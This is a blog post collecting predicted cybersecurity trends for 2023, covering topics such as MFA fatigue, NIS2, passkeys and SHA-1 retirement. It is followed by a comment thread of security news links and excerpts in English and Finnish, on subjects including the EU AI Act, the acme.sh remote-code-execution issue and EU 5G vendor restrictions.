Nothing is more difficult than making predictions, especially in fast advancing cyber security field. Instead of me trowing out wild ideas what might be coming, I have collected here some trends many people and publications have predicted for 2023.
HTTPS: These days HTTPS has effectively become the default transport for web browsing. Most notably, the Chrome browser now marks any older HTTP website as “Not Secure” in the address bar. Chrome to attempt to “upgrade” to the HTTPS version of websites, if you ever accidentally navigate to the insecure version. If a secure version isn’t available, an on-screen warning is shown, asking if you would like to continue. As HTTPS has become more common across the web, Google Chrome is preparing to launch a security option that will block “insecure” downloads through HTTP on Chrome browser.
Malwertising: Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users also in 2023. The FBI is warning US consumers that cybercriminals are placing ads in search engine results that impersonate well-known brands, in an attempt to spread ransomware and steal financial information. Cybercriminals are purchasing ads that show up at the very top of search engine results, often purporting to link to a legitimate company’s website. However, anyone clicking on the link is instead taken to a lookalike page that may appear identical, but is in fact designed to phish for login credentials and financial details, or even trick the unwary into downloading ransomware. The FBI has advised consumers to use ad blockers to protect themselves from such threats.
Encrypted malware: The vast majority of malware arriving over encrypted connections that are typically HTTPS web sessions. The vast majority of cyber-attacks over the past year have used TLS/SSL encryption to hide from security teams traditional firewalls and many other security tools. Over 85% of Attacks Hide in Encrypted Channels. WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections. If you are not inspecting encrypted traffic when it enters your network, you will not be able to detect most malware at network level. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.
Software vulnerabilities: Weak configurations for encryption and missing security headers will be still very common in 2023. In 2022 nearly every application has at least one vulnerability or misconfiguration that affects security and a quarter of application tests found a highly or critically severe vulnerability. Read more at Misconfigurations, Vulnerabilities Found in 95% of Applications
Old vulnerabilities: You will see attackers try to use old vulnerabilities again in 2023 because they work. Attackers will take the path of least resistance, and as long as vendors don’t consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones. There are many companies that do not patch their systems at reasonable time or at all, so they stay vulnerable. Also new variations of old vulnerabilities are also developed: approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities.
Security gaps: There are still big gaps in companies’ cyber security. The rapid advancement of technology in all industries has led to the threat of ever-increasing cyberattacks that target businesses, governments, and individuals alike. Lack of knowledge, maintenance of employees’ skills and indifference are the strongest obstacles in the development of many companies’ cyber security. While security screening and limiting who has access to your data are both important aspects of personnel security, they will only get you so far.
Cloud: In a hyperscale cloud provider, there can be potentially several thousand people, working around the globe that could potentially access our data. Security screening and limiting alone still leaves a significant risk of malicious or accidental access to data. Instead, you should expect your cloud provider to take a more layered approach.
MFA: MFA Fatigue attacks are putting your organization at risk in 2023. Multi-factor auth fatigue is real. A common threat targeting businesses is MFA fatigue attacks a technique where a cybercriminal attempts to gain access to a corporate network by bombarding a user with MFA prompts until they finally accept one. This attempt can be successful, especially when the target victim is distracted or overwhelmed by the notifications or misinterprets them with legitimate authentication requests. t’s a huge threat because it bypasses one of the most effective the security measures.
Passwords: Passwords will not go away completely even though new solutions to replace then will be pushed to users. When you create passwords or passphrases, make them good and long enough to be secure. Including a comma character to the password can make it harder for cyber criminals to use if for some reason it leaks out. The reason us that comma in password can obfuscate tabular comma separated values (csv) files, which are a common way to collect and distribute stolen passwords.
EU: The Network and Information Security (NIS) Directive was the first piece of EU-wide legislation on cybersecurity: Network and Information Security 2 also known as NIS2. Rules requiring EU countries to meet stricter supervisory and enforcement measures and harmonise their sanctions were approved by MEPs on late 2022. They will start to affect security decisions in 2023. The new rules will set tighter cybersecurity obligations for risk management, reporting obligations and information sharing. The requirements cover incident response, supply chain security, encryption and vulnerability disclosure, among other provisions. The new rules will also protect so-called “important sectors” such as postal services, waste management, chemicals, food, manufacturing of medical devices, electronics, machinery, motor vehicles and digital providers. All medium-sized and large companies in selected sectors would fall under the legislation. The NIS Directive has impacted the cybersecurity budget of operators over the past year with deep-dives into the Energy and Health sectors. Cybersecurity Investments in the EU: Is the Money Enough to Meet the New Cybersecurity Standards?
USA: CISA has released cross-sector cybersecurity performance goals (CPGs) in response to President Biden’s 2021 National Security Memorandum on improving cybersecurity for critical infrastructure control systems. Since then, the CPGs have been observed by the cybersecurity community as “the floor” and “a baseline” to cybersecurity hygiene and practices. Many organizations overlook OT as part of their cybersecurity strategy, remaining their focus solely to IT systems. Especially in the critical infrastructure sectors, overlooking OT can have serious risks to all operations. As a result, the CPGs released explicitly are scoped to include OT devices.
Android: Android security will advance in 2023 in many ways. Android is adding support for updatable root certificates in the next Android 14 release. Google Play now lets children send purchase requests to guardians.
Loosing the trust: The world’s biggest tech companies have lost confidence in one of the Internet’s behind-the-scenes gatekeepers. Microsoft, Mozilla, and Google are dropping TrustCor Systems as a root certificate authority in their products.
Need for better communication: At a time when less than a fifth (18%) of risk and compliance professionals profess to be very confident in their ability to clearly communicate risk to the board, it’s clear that lines of communication—not to mention understanding—must be improved.
Supply chain risks: Watch for geopolitical instability to continue to be a governance issue, particularly with the need to oversee third-party and supply chain risk.
Privacy and data protection:Privacy and data protection are the big story for compliance officers in 2023, with expanding regulations soon expected to cover five billion citizens.
Business risks: In 2023, business risks will run the gamut: geopolitical volatility, talent management, DEI (Diversity, Equity, and Inclusion), ESG (Environmental, Social, and Governance), IT security amid continued remote and hybrid work, and business continuity amid the threat of large-scale operational and utility interruptions. There is also a challenge that Executives take more cybersecurity risks than office workers – leaders engage in more dangerous behavior and are four times more likely to be victims of phishing compared to office workers.
Integrated Risk Management: Look for risk to be increasingly viewed as a driver of business performance and value as digital landscapes and business models evolve. Forward-looking companies will embed integrated risk management (IRM) into their business strategy, so they can better understand the risks associated with new strategic initiatives and be able to pivot as necessary. Keep in mind that Executives take more cybersecurity risks than office workers
Zero trust: Many people think that Zero Trust is pretty optimal security practice in 2023. It is good for those new systems to whom it’s model suits, but Zero Trust has also challenges. Incorporating zero trust into an existing network can be very expensive. Zero Trust Shouldnt Be The New Normal article says that the zero trust model starts to erode when the resources of two corporations need to play together nicely. Federated activity, ranging from authentication to resource pooled cloud federation, doesnt coexist well with zero trust. To usefully emulate the kind of informed trust model that humans use every day, we need to flip the entire concept of zero trust on its head. In order to do that, network interactions need to be evaluated in terms of risk. Thats where identity-first networking comes in. In order for a network request to be accepted, it needs both an identity and explicit authorization; System for Cross-domain Identity Management (SCIM) based synchronization is used to achieve this. This securely automates the exchange of a user identity between cloud applications, diverse networks, and service providers.
Poor software: There will be a lot of poor software in use in 2023 and it will cost lots of money. Poor software costs the US 2.4 trillion: cyberattacks due to existing vulnerabilities, complex issues involving the software supply chain, and the growing impact of rapidly accumulating technical debt have led to a build-up of historic software deficiencies.
Microsoft: Microsoft will permanently turn off Exchange Online basic authentication starting early January 2023 to improve security. A future Microsoft Edge update would permanently disable the Internet Explorer 11 desktop web browser on some Windows 10 systems in February. This means that “The out-of-support Internet Explorer 11 (IE11) desktop application is scheduled to be permanently disabled on certain versions of Windows 10 devices on February 14, 2023, through a Microsoft Edge update, not a Windows update as previously communicated”
Google Workplace: Google Workspace Gets Client-Side Encryption in Gmail. Long waited Client-side encryption for Gmail available in beta .
Google is letting businesses try out client-side encryption for Gmail, but it’s probably not coming to personal accounts anytime soon. Google has already enabled optional client-side encryption for many Workspace services.
Passkeys: Google has made passkey support available in the stable version of Chrome. Passkeys use biometric verification to authenticate users and are meant to replace the use of passwords, which can be easily compromised. Passkeys are usable cross-platform with both applications and websites. Passkeys offer the same experience that password autofill does, but provide the advantage of passwordless authentication. They cannot be reused, don’t leak in server breaches, and protect users from phishing attacks. Passkeys are only available for websites that provide support for them, via the WebAuthn API,
War risks: Watch for continued war between Russia and Ukraine real world and cyber world in 2023. Cyber as important as missile defences – an ex-NATO general. The risk of escalation from cyber attacks has never been greater. A cyber attack on the German ports of Bremerhaven or Hamburg would severely impede NATO efforts to send military reinforcements to allies, retired U.S. General Ben Hodges told Reuters.
Cloud takeover: AWS Elastic IP Transfer Feature Gives Cyberattackers Free Range
Threat actors can take over victims’ cloud accounts to steal data, or use them for command-and-control for phishing attacks, denial of service, or other cyberattacks.
ISC: ICS and SCADA systems remain trending attack targets also in 2023.
Code security: Microsoft-owned code hosting platform GitHub has just announced multiple security improvements, including free secret scanning for public repositories and mandatory two-factor authentication (2FA) for developers and contributors. The secret scanning program is meant to help developers and organizations identify exposed secrets and credentials in their code. In 2022, code scanning helped identify 1.7 million potential secrets exposed in public repositories. Now the feature is available for free for all free public repositories, to help prevent secret exposures and secure the open source ecosystem. With secret scanning alerts, you can track and action on leaked secrets directly within GitHub.
Data destruction: We must develop a cloud-compatible way of doing destruction that meets security standards. Maybe cloud providers can come up with a service to provide this capability, since only they have direct access to the underlying hardware. They have never been shy about inventing new services to charge for, and certainly plenty of companies would be eager to pay for such a service, if the appropriate certificates of destruction were provided.
PCI DSS: PCI DSS 4.0 Should Be on Your Radar in 2023 if you work on field that needs to meet that. The latest version of the standard will bring a new focus to an overlooked yet critically important area of security. For a long time, client-side threats, which involve security incidents and breaches that occur on the customer’s computer rather than on the company’s servers or in between the two, were disregarded. But that’s changing with the release of PCI DSS 4.0. Now, many new requirements focus on client-side security.
SHA-1: NIST Retires SHA-1 Cryptographic Algorithm, not fully in 2023, but starts preparations for phase-out. The venerable cryptographic hash function has vulnerabilities that make its further use inadvisable. According to NIST, SHA-1 ‘has reached the end of its useful life’, given that the high computing capabilities of today’s systems can easily attack the algorithm using the technique is referred to as a ‘collision’ attack. SHA-1, whose initials stand for secure hash algorithm, has been in use since 1995 as part of the Federal Information Processing Standard and NIST has announced that SHA-1 should be phased out by Dec. 31, 2030, in favor of the more secure SHA-2 and SHA-3 groups of algorithms. The US National Institute of Standards and Technology (NIST) recommended that IT professionals start replace the 27 years old SHA-1 cryptographic algorithm with newer, more secure ones. Because SHA-1 is used as the foundation of numerous security applications, the phaseout period will take many years. Tech giants such as Google, Facebook, Microsoft and Mozilla have already taken steps to move away from the SHA-1 cryptographic algorithm. Certificate authorities stopped issuing certificates using SHA-1 as of January 1, 2017.
Cloud: Is Cloud Native Security Good Enough? Cloud native technologies enable organizations to tap into the agility required to keep up in the current competitive landscape and to create new business models. But achieving efficient, flexible, distributed and resilient cloud native security is tough. All major public cloud providers -Amazon Web Services (AWS), Microsoft Azure and Google Cloud- of course offer security features and services, which are designed to address significant threats to cloud-based data. However, in spite of this, public cloud providers’ security tools commonly fail to meet operational needs, and their limitations should prompt organizations to consider or reconsider how they are protecting public cloud environments.
Privacy: The Privacy War Is Coming. Privacy standards are only going to increase. It’s time for organizations to get ahead of the coming reckoning.
Ethical hacking: Ethical hacking has become a highly-sought after career route for emerging tech aspirants. The role of ethical hackers enables countless businesses and individuals to improve their security posture and minimize the potential attack risk for organizations. But there are several analysts who believe that becoming a self-taught ethical hacker in 2023 might not be worth it because they are at constant risk of failing to perform properly and many companies might not want to hire an ethical hacker.
MFA: Two factor authentication might not be enough in 2023 for applications that need good security. In the past few months, we’ve seen an unprecedented number of identity theft attacks targeting accounts protected by two-factor authentication (2FA), challenging the perception that existing 2FA solutions provide adequate protection against identity theft attacks. So for some demanding users 2FA is over. Long live 3FA!
Cloud APIs: With Cloud Comes APIs & Security Headaches also in 2023. Web application programming interfaces (APIs) are the glue that holds together cloud applications and infrastructure, but these endpoints are increasingly under attack, with half of companies acknowledging an API-related security incident in the past 12 months. ccording to a survey conducted by Google Cloud, the most troublesome security problems affecting companies’ use of APIs are security misconfigurations, outdated APIs and components, and spam or abuse bots . About 40% of companies are suffering an incident due to misconfiguration and a third coping with the latter two issues. Two-thirds of companies (67%) found API-related security issues and vulnerabilities during the testing phase, but more than three-quarters (77%) have confidence that they will catch issues, saying they have the required API tools and solutions-
Lack of cyber security workers: Businesses need to secure their assets and ensure the continuous readiness of employees to respond to a cyberattack if they want to move forward safely and avoid losses caused by cybercriminals or malicious attackers. There is an acute shortage of cyber security professionals. As Threat Levels remain high, companies and organizations remain on alert – but face ongoing challenges in finding and retaining the right people with the required skill levels. There is a significant skills gap and a clear need for hiring cyber security experts in organizations across the world.
VPN: Is Enterprise VPN on Life Support or Ripe for Reinvention? While enterprise VPNs fill a vital role for business, they have several limitations. To get work-from-anywhere initiatives off the ground quickly and keep their business afloat, many organizations turned to enterprise virtual private networks (VPNs). This allowed them to connect their remote employees to critical business operations at the corporate site. However, as fast as VPNs were deployed, organizations learned their limitations and security risks. So are traditional VPNs really “dead” as some industry analysts and pundits claim? Or do they simply need a refresh? Time will tell, and this will be discussed in 2023.
AI: Corporations have discovered the power of artificial intelligence (A.I.) to transform what’s possible in their operations
But with great promise comes great responsibility—and a growing imperative for monitoring and governance. “As algorithmic decision-making becomes part of many core business functions, it creates the kind of enterprise risks to which boards need to pay attention.
AI dangers: Large AI language models have potential dangers. AI is better at fooling humans than ever—and the consequences will be serious. Wired magazine article expects that In 2023, we may well see our first death by chatbot. Causality will be hard to prove was it really the words of the chatbot that put the murderer over the edge? Or perhaps a chatbot has broken someone’s heart so badly they felt compelled to take their own life?
Metaverse: Police Must Prepare For New Crimes In The Metaverse, Says Europol. It encourages law enforcement agencies to start considering the ways in which existing types of crime could spread to virtual worlds, while entirely new crimes could start to appear. ReadPolicing in the metaverse: what law enforcement needs to know report for more information.
Blockchain: Digital products like cryptocurrency and blockchain will affect a company’s risk profile. Boards and management will need to understand these assets’ potential impact and align governance with their overall risk and business strategies. Year 2022 already showed how a lot of cryptocurrency related risks realized. More “Crypto travel rules” enacted to combat money laundering and terrorism financing.
Insurance: Getting a cyber insurance can become harder and more expensive in 2023. Insurance executives have been increasingly vocal in recent years about systemic risks and now increasing cyber was the risk to watch. Spiralling cyber losses in recent years have prompted emergency measures by the sector’s underwriters to limit their exposure. There is growing concern among industry executives about large-scale strikes. As well as pushing up prices, some insurers have responded by tweaking policies so clients retain more losses. There are already insurance policies written in the market have an exemption for state-backed attacks, but but the difficulty of identifying those behind attacks and their affiliations makes such exemptions legally fraught. The chief executive of one of Europe’s biggest insurance companies has warned that cyber attacks, rather than natural catastrophes, will become “uninsurable” as the disruption from hacks continues to grow. Recent attacks that have disrupted hospitals, shut down pipelines and targeted government department. “What if someone takes control of vital parts of our infrastructure, the consequences of that?” In September, the US government called for views on whether a federal insurance response to cyber was warranted.
Sources:
Asiantuntija neuvoo käyttämään pilkkua salasanassa – taustalla vinha logiikka
Overseeing artificial intelligence: Moving your board from reticence to confidence
Android is adding support for updatable root certificates amidst TrustCor scare
Google Play now lets children send purchase requests to guardians
Diligent’s outlook for 2023: Risk is the trend to watch
Microsoft will turn off Exchange Online basic auth in January
Google is letting businesses try out client-side encryption for Gmail
Google Workspace Gets Client-Side Encryption in Gmail
The risk of escalation from cyberattacks has never been greater
Client-side encryption for Gmail available in beta
AWS Elastic IP Transfer Feature Gives Cyberattackers Free Range
Microsoft: Edge update will disable Internet Explorer in February
Is Cloud Native Security Good Enough?
Top Reasons Not to Become a Self-Taught Ethical Hacker in 2023
Google Chrome preparing an option to block insecure HTTP downloads
Cyber attacks set to become ‘uninsurable’, says Zurich chief
The Dark Risk of Large Language Models
Police Must Prepare For New Crimes In The Metaverse, Says Europol
Policing in the metaverse: what law enforcement needs to know
Cyber as important as missile defences – an ex-NATO general
Misconfigurations, Vulnerabilities Found in 95% of Applications
Personnel security in the cloud
Multi-factor auth fatigue is real – and it’s why you may be in the headlines next
MFA Fatigue attacks are putting your organization at risk
NIS2 hyväksyttiin – EU-maille tiukemmat kyberturvavaatimukset
Cybersecurity Investments in the EU: Is the Money Enough to Meet the New Cybersecurity Standards?
Poor software costs the US 2.4 trillion
Passkeys Now Fully Supported in Google Chrome
Google Takes Gmail Security to the Next Level with Client-Side Encryption
Executives take more cybersecurity risks than office workers
NIST Retires SHA-1 Cryptographic Algorithm
NIST to Retire 27-Year-Old SHA-1 Cryptographic Algorithm
WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections
Over 85% of Attacks Hide in Encrypted Channels
GitHub Announces Free Secret Scanning, Mandatory 2FA
Leaked a secret? Check your GitHub alerts…for free
Data Destruction Policies in the Age of Cloud Computing
Why PCI DSS 4.0 Should Be on Your Radar in 2023
Google: With Cloud Comes APIs & Security Headaches
Digesting CISA’s Cross-Sector Cybersecurity Performance Goals
Zero Trust Shouldnt Be The New Normal
Don’t click too quick! FBI warns of malicious search engine ads
FBI Recommends Ad Blockers as Cybercriminals Impersonate Brands in Search Engine Ads
Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users
Kyberturvan ammattilaisista on huutava pula
1,768 Comments
Tomi Engdahl says:
https://www.securityweek.com/in-other-news-linux-kernel-exploits-update-on-bec-losses-cybersecurity-awareness-act/
European Parliament votes in favor of AI Act
Despite last week’s concerns over the future of the EU AI Act, the European Parliament has voted in favor — by 499 to 28, with 93 abstentions. The details still have to be agreed by the European Council (representing the national governments) and the European Commission — and there is likely to be some pushback from both; for example, in policing areas. As it stands, the law is heavily focused on people (privacy and personal rights), potentially outlawing areas such as emotion detection, and predictive policing. It also provides greater transparency over AI data content; for example, restrictions on the use of copyright material. The Act contrasts with Google’s SAIF proposals: the former concentrates on the content, while the latter concentrates on the technology.
AI Act enters final phase of EU legislative process
https://www.euractiv.com/section/artificial-intelligence/news/ai-act-enters-final-phase-of-eu-legislative-process/
The European Parliament adopted its position on the AI rulebook with an overwhelming majority on Wednesday (14 June), paving the way for the interinstitutional negotiations set to finalise the world’s first comprehensive law on Artificial Intelligence.
The AI Act is a flagship initiative to regulate this disruptive technology based on its capacity to cause harm. It follows a risk-based approach, banning AI applications that pose an unacceptable risk and imposing a strict regime for high-risk use cases.
“Is this the right time to regulate AI? My answer is resolutely yes. It is the right time because of the profound impact that AI has,” Dragoș Tudorache, one of the European Parliament’s co-rapporteurs on the AI Act, told his peers ahead of the vote.
Banned practices
Where to draw a line on the types of AI applications that should be forbidden was at the centre of the last-minute attempts to change the text adopted at the parliamentary committee level.
The main point of contention related to Remote Biometric Identification. Liberal and progressive lawmakers sought to ban the real-time use of this technology but allow it for ex-post investigations on serious crimes.
By contrast, the centre-right European People’s Party tried to introduce derogations to the real-time ban for exceptional circumstances such as terrorist attacks or missing people. This last-minute attempt enraged the other political groups but was eventually unsuccessful.
However, a parliamentary official told EURACTIV that the point of plenary amendments is not always to modify the text but to send a political message.
Foundation models & generative AI
The EU lawmakers introduced a tiered approach for AI models that do not have a specific purpose, so-called General Purpose AI, with a stricter regime for foundation models, large language models on which other AI systems can be built.
The top layer relates to generative AI like ChatGPT, for which the European Parliament wants to introduce mandatory labelling for AI-generated content and force the disclosure of training data covered by copyright.
With ChatGPT, generative AI caught mass attention, and the European Commission has launched outreach initiatives attempting to anticipate the AI rules and foster international alignment at the G7 level.
On these initiatives, leading MEP Brando Benifei warned that they “could become a context where the businesses will act to influence the legislative work,” which is now the focus of the lobbying efforts to water down the regulation. “But if we cooperate correctly between the institutions, this will be prevented.”
The list of prohibited practices was extended to subliminal techniques, biometric categorisation, predictive policing, internet-scrapped facial recognition databases, and emotion recognition software is forbidden in law enforcement, border management, workplace and education.
An extra layer was added for AI applications to fall in the high-risk category, whilst the list of high-risk areas and use cases were made more precise and extended in law enforcement and migration control areas. Recommender systems of prominent social media were added as high-risk.
AI Act: MEPs close in on rules for general purpose AI, foundation models
https://www.euractiv.com/section/artificial-intelligence/news/ai-act-meps-close-in-on-rules-for-general-purpose-ai-foundation-models/
Google Introduces SAIF, a Framework for Secure AI Development and Use
https://www.securityweek.com/google-introduces-saif-a-framework-for-secure-ai-development-and-use/
The Google SAIF (Secure AI Framework) is designed to provide a security framework or ecosystem for the development, use and protection of AI systems.
Tomi Engdahl says:
https://hackaday.com/2023/06/15/the-simplest-social-engineering-hack-of-them-all/
Tomi Engdahl says:
This Week In Security: ACME.sh, Leaking LEDs, And Android Apps
https://hackaday.com/2023/06/16/this-week-in-security-acme-sh-leaking-leds-and-android-apps/
Let’s Encrypt has made an enormous difference to the landscape of the web. The protocol used for authenticating and receiving certificates, ACME, has spawned quite a few clients of various flavors. Some are written in Rust, some in Python or Go, and a few in straight Bash shell script. One of those last ones, acme.sh, was doing something odd when talking to a particular “Certificate Authority”, HiCA. This pseudo-CA only supports acme.sh, and now we know why. The folks behind HiCA found an RCE exploit in acme.sh, and decided to use that exploit to do certificate issuance with more “flexability”. Oof.
The nuts and bolts here is that HiCA was working as a CA-in-the-Middle, wrapping other CA’s authentication services. Those services don’t support ACME authentication at all, and HiCA used the acme.sh vulnerability to put the authentication token in the place SSL.com expected to find it. So, just a good community member offering a service that ACME doesn’t quite support, right?
The takeaway is twofold. First, as an end user, only use reputable CAs. And second, ACME clients need to be hardened against potentially malicious CAs.
acme.sh runs arbitrary commands from a remote server
https://github.com/acmesh-official/acme.sh/issues/4659
Tomi Engdahl says:
EU:lta uusi 5G-raportti – kielto Huawein ja ZTE:n verkkolaitteille
https://www.uusiteknologia.fi/2023/06/19/eulta-uusi-5g-raportti-kielto-huawein-ja-zten-verkkolaitteille/
Euroopan komissio on julkaissut jo toisen kerran 5G-verkkojen kyberturvallisuutta käsittelevän raportin, jonka täydennykseksi komissio antoi lisäksi uuden tiedonannon, jonka mukaan EU-maiden pitää kieltäytyä 5G-verkoissa kiinalaisten Huawein ja ZTE:n verkkolaitteista.
EU:n jäsenmaat julkaisivat tänään Euroopan komission ja EU:n kyberturvallisuusviraston ENISAn tuella toisen edistymisraportin 5G-kyberturvallisuutta koskevan EU:n välineistön täytäntöönpanosta.
Strategisten toimenpiteiden ja erityisesti suuririskisiä toimittajia koskevien rajoitusten käyttöönoton osalta edistymisraportissa todetaan, että 24 jäsenmaata on hyväksynyt tai valmistelee parhaillaan lainsäädäntötoimenpiteitä, joilla kansallisille viranomaisille annetaan valtuudet arvioida toimittajia ja asettaa rajoituksia.
Raportin mukaan kymmenen EU:n jäsenmaata on asettanut rajoituksia ja kolme jäsenmaata on parhaillaan panemassa täytäntöön asiaa koskevaa kansallista lainsäädäntöä. EU-komission mukaan jäsenmaiden olisi pantava välineistö täytäntöön viipymättä.
Komissio katsoo, että jäsenmaiden tekemät päätökset Huawein ja ZTE:n toiminnan rajoittamisesta tai sulkemisesta 5G-verkkojen ulkopuolelle ovat perusteltuja ja 5G-verkkoratkaisujen mukaisia. Komissio katsoo, että Huawei ja ZTE aiheuttavat olennaisesti suurempia riskejä kuin muut 5G-toimittajat.
Komission tiedonanto: 5G-kyberturvallisuusvälineistön täytäntöönpano
https://digital-strategy.ec.europa.eu/fi/library/communication-commission-implementation-5g-cybersecurity-toolbox
Second report on Member States’ progress in implementing the EU Toolbox on 5G Cybersecurity
https://ec.europa.eu/newsroom/dae/redirection/document/96519
Tomi Engdahl says:
Euroopan komissio: Huawein ja ZTE:n verkkolaitteet ovat turvallisuusriski
https://etn.fi/index.php/13-news/15105-euroopan-komissio-huawein-ja-zte-n-verkkolaitteet-ovat-turvallisuusriski
EU-komissio on julkistanut päivitetyn raportin niin sanotusta 5G-työkalupakistaan, joka käytetään arvioimaan jäsenmaiden operaattorien verkoissa käytettyjä laitetoimittajia. Huawein ja ZTE:n kannalta komission arvio on tyly: niiden laitteet muodostavat huomattavasti muiden. valmistajien laitteita suuremman riskin.
Komission lausunnossa todetaan, että jäsenvaltioiden päätökset rajoittaa tai kokonaan estää Huawein ja ZTE:n osallistuminen 5G-verkkojen käyttöönottoon ovat olleet oikeita ja sopusoinnussa maiden aiemmin sopimien toimenpiteiden kanssa turvallisen 5G:n käyttöönottamiseksi. Näin esimerkiksi Ruotsi teki aivan oikein estäessään Huawein ja ZTE:n pääsyn laitetoimittajina maan 5G-taajuuskisaan.
Tomi Engdahl says:
Käyttäjiltä huijataan vuosittain satoja miljoonia – Metaa vaaditaan vastuuseen https://www.tivi.fi/uutiset/tv/51f43b68-d13b-47e1-9573-c92ad652f36c
Metaa vaaditaan Britanniassa estämään tehokkaammin verkkohuijauksia, jotka tapahtuvat sen alustoilla.
The Guardian raportoi, että Facebookissa tai Instagramissa joutuu huijatuksi yksi britti keskimäärin joka seitsemäs minuutti. Vuosittain briteiltä huijataan palveluissa mahdollisesti yhteensä jopa 250 miljoonan punnan eli yli
290 miljoonan euron summa.
Tomi Engdahl says:
JPL Creates World’s Largest PDF Archive to Aid Malware Research https://www.jpl.nasa.gov/news/jpl-creates-worlds-largest-pdf-archive-to-aid-malware-research
“As part of DARPA’s SafeDocs program, JPL data scientists have amassed 8 million PDFs that can now be used for further study in order to make the internet more secure.”
Tomi Engdahl says:
Keep it, Tweak it, Trash it – What to do with Aging Tech in an Era of Consolidation
https://www.securityweek.com/keep-it-tweak-it-trash-it-what-to-do-with-aging-tech-in-an-era-of-consolidation/
Security vendor consolidation is picking up steam with good reason. Everyone wants to improve security efficiency and effectiveness while paying for less.
Consolidating security tools is a growing industry trend. In fact, a survey by Gartner found that 75% of organizations were pursuing security vendor consolidation in 2022, up from 29% in 2020.
IT is often viewed as a cost center and security is part of that. No one has unlimited budgets, and the pressure is on to justify costs and do more with less. The situation gets worse when earnings are down and there’s a looming specter of a slowdown in the economy.
Many security teams are being asked to start rethinking their approach to security if budgets get trimmed. It’s a natural part of the cycle of business and it’s rarely easy. But it can be a particularly onerous task within large, modern enterprises where Atomized Networks consist of up to three types of environments: IT, cloud, and operational technology (OT) environments. And, in many cases, each environment has a different team using different network traffic monitoring and security tools.
Some of these tools are “free” – whatever the cloud provider or service has available – and the perception is that there is no impact on budget. But the truth is, nothing is ever free. We’re making a tradeoff between paying for the tool and paying for people’s time to use, manage, and maintain a collection of different tool sets in different areas of the infrastructure. And that labor intensity is very costly.
Breaking Enterprise Silos and Improving Protection
https://www.securityweek.com/breaking-enterprise-silos-and-improving-protection/
When teams have a way to break down enterprise silos and see and understand what is happening, they can improve protection across their increasingly dispersed and diverse environment.
Tomi Engdahl says:
Watch on Demand: 2023 CISO Forum Sessions
All panel discussions and technical presentations from SecurityWeek’s 2023 CISO Forum are available to watch free on demand.
https://www.securityweek.com/watch-on-demand-2023-ciso-forum-sessions/
Tomi Engdahl says:
Suomi on Euroopan kyberturvallisin maa
https://etn.fi/index.php/13-news/15109-suomi-on-euroopan-kyberturvallisin-maa
Sovellusten tietoturvaratkaisuja kehittävä Indusface on listannut Euroopan maat paremmuusjärjestykseen sen mukaan, miten turvallisia ne ovat liiketoiminnan kannalta. Suomi nousi vertailun kärkeen yhdessä Belgian kanssa kaikkein korkeimmilla pisteillä.
Suomi ja Belgia kirjasovat Indusfacen vertailussa kyberturvaindeksiksi lukeman 82,45, kun maksimi on 100. Itävalta sijoittuu kolmanneksi pistemäärällä 80,59. Euroopan kyberturvattomin maa on Bulgaria, jonka indeksiluku oli 51,92.
Tomi Engdahl says:
https://etn.fi/index.php/tekniset-artikkelit/15107-salaus-ja-todennus-suojaa-vaeaerennoeksiltae
Tomi Engdahl says:
https://www.uusiteknologia.fi/2023/06/15/yritykset-varastoivat-turhaan-vanhoja-tietokoneitaan-tietoturvariski/
Tomi Engdahl says:
Tästä tietoturvaohjeet lomailijalle – yrityslaitteet erikoistarkkailuun
https://www.uusiteknologia.fi/2023/06/20/tasta-tietoturvaohjeet-lomailijalle/
Konsulttiyritys Deloitten kyberturvallisuuden asiantuntijat listasivat uusimmat vinkkinsä, mitä lomailijan kannattaa huomioida ennen matkaa, sen aikana ja matkan jälkeen. Lisäksi yritysten olisi tärkeää tiedottaa ja ohjeistaa työntekijöitään tietoturvastaan, jotta matkailijoiden ja yritysten tietoturvallisuus säilyy myös lomakauden aikana. Varsinkin kun monia niistä käytetään myös yritysasioiden hoitamiseen.
Tomi Engdahl says:
CISO Conversations: Three Leading CISOs From the Payment Industry
https://www.securityweek.com/ciso-conversations-three-leading-cisos-from-the-payment-industry/
SecurityWeek talks to Chief Information Security Officers from Bill.com, FreedomPay, and Tassat about their role and experience as CISOs.
Tomi Engdahl says:
DOJ Launches Cyber Unit to Prosecute Nation-State Threat Actors
https://www.securityweek.com/doj-launches-cyber-unit-to-prosecute-nation-state-threat-actors/
New National Security Cyber Section will help the US disrupt and prosecute nation-state threat actors and state-sponsored cybercriminals.
The United States Department of Justice (DOJ) has created a new litigating section to increase its ability to disrupt and prosecute nation-state threat actors and state-sponsored cybercriminals.
Part of the National Security Division (NSD), the newly announced National Security Cyber Section – known as NatSec Cyber – will increase the Justice Department’s capacity to fight malicious cyberattacks threatening national security.
“This new section will allow NSD to increase the scale and speed of disruption campaigns and prosecutions of nation-state threat actors, state-sponsored cybercriminals, associated money launderers, and other cyber-enabled threats to national security,” NSD Assistant Attorney General Matthew G. Olsen said.
In tackling growing threats by nation-state attackers, the NatSec Cyber will also bolster intragovernmental collaboration between the Criminal Division’s Computer Crimes and Intellectual Property Section (CCIPS) and the FBI’s Cyber Division.
Tomi Engdahl says:
Hallitus aikoo puuttua Venäjän hybridivaikuttamiseen kovin ottein – Rikoslakiin kaavaillaan ”Bäckman-pykälää”
https://www.hs.fi/kotimaa/art-2000009669184.html?fbclid=IwAR18n_YNS527vwNByXbZcewZF_Od5HNFYOoaxa7z8vROwKSz5vUJ6-zzhQM
Rikosoikeuden professorin mukaan uutta sääntelyä todennäköisesti tarvitaan, mutta se ei saa rajoittaa perustuslaissa määriteltyä sananvapautta.
HALLITUS aikoo kriminalisoida Suomen yhteiskunnalliseen päätöksentekoon vaikuttamisen ja Suomen päätöksentekoa tai yhteiskunnallisia oloja koskevan perättömän tiedon levittämisen, kun ne tapahtuvat vieraan valtion hyväksi ja toiminta on järjestelmällistä.
Asia on kirjattu hallitusohjelmaan suojelupoliisia (supo) käsittelevän alaotsikon alle. Supo on itse ehdottanut samankaltaista kriminalisointia viime syksynä, josta Yle uutisoi tuolloin.
